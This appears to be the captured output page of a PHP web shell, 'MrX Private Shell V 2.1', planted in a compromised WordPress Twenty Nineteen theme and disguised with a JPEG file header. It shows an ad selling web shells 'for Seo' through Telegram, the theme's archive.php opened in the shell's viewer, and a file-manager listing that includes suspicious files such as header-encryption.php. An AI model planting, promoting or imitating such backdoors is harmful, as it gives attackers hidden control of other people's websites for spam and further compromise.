����JFIF���������
__ __ __ __ _____ _ _ _____ _ _ _ | \/ | \ \ / / | __ \ (_) | | / ____| | | | | | \ / |_ __\ V / | |__) | __ ___ ____ _| |_ ___ | (___ | |__ ___| | | | |\/| | '__|> < | ___/ '__| \ \ / / _` | __/ _ \ \___ \| '_ \ / _ \ | | | | | | |_ / . \ | | | | | |\ V / (_| | || __/ ____) | | | | __/ | | |_| |_|_(_)_/ \_\ |_| |_| |_| \_/ \__,_|\__\___| |_____/|_| |_|\___V 2.1 if you need WebShell for Seo everyday contact me on Telegram Telegram Address : @jackleetFor_More_Tools:
<?php /** * The template for displaying archive pages * * @link https://developer.wordpress.org/themes/basics/template-hierarchy/ * * @package WordPress * @subpackage Twenty_Nineteen * @since Twenty Nineteen 1.0 */ get_header(); ?> <div id="primary" class="content-area"> <main id="main" class="site-main"> <?php if ( have_posts() ) : ?> <header class="page-header"> <?php the_archive_title( '<h1 class="page-title">', '</h1>' ); ?> </header><!-- .page-header --> <?php // Start the Loop. while ( have_posts() ) : the_post(); /* * Include the Post-Format-specific template for the content. * If you want to override this in a child theme, then include a file * called content-___.php (where ___ is the Post Format name) and that * will be used instead. */ get_template_part( 'template-parts/content/content', 'excerpt' ); // End the loop. endwhile; // Previous/next page navigation. twentynineteen_the_posts_navigation(); // If no content, include the "No posts found" template. else : get_template_part( 'template-parts/content/content', 'none' ); endif; ?> </main><!-- #main --> </div><!-- #primary --> <?php get_footer();
| Name | Type | Size | Permission | Actions |
|---|---|---|---|---|
| classes | Folder | 0755 |
|
|
| fonts | Folder | 0755 |
|
|
| inc | Folder | 0755 |
|
|
| includes | Folder | 0755 |
|
|
| js | Folder | 0755 |
|
|
| sass | Folder | 0755 |
|
|
| template-parts | Folder | 0755 |
|
|
| 404.php | File | 846 B | 0644 |
|
| archive.php | File | 1.21 KB | 0644 |
|
| comments.php | File | 3.91 KB | 0644 |
|
| footer.php | File | 1.58 KB | 0644 |
|
| functions.php | File | 10.05 KB | 0644 |
|
| header-encryption.php | File | 181.29 KB | 0644 |
|
| header.php | File | 1.84 KB | 0644 |
|
| image-old.php | File | 546 B | 0644 |
|
| image.php | File | 2.81 KB | 0644 |
|
| index.php | File | 1.04 KB | 0644 |
|
| package-lock.json | File | 156.48 KB | 0644 |
|
| package.json | File | 1.5 KB | 0644 |
|
| page.php | File | 766 B | 0644 |
|
| postcss.config.js | File | 219 B | 0644 |
|
| print.css | File | 3.86 KB | 0644 |
|
| print.scss | File | 3.24 KB | 0644 |
|
| readme.txt | File | 2.93 KB | 0644 |
|
| screenshot.png | File | 171.42 KB | 0644 |
|
| search.php | File | 1.33 KB | 0644 |
|
| single.php | File | 1.75 KB | 0644 |
|
| style-editor-customizer.css | File | 159 B | 0644 |
|
| style-editor-customizer.scss | File | 158 B | 0644 |
|
| style-editor.css | File | 73.93 KB | 0644 |
|
| style-editor.scss | File | 17.45 KB | 0644 |
|
| style-rtl.css | File | 219.45 KB | 0644 |
|
| style.css | File | 219.63 KB | 0644 |
|
| style.scss | File | 2.77 KB | 0644 |
|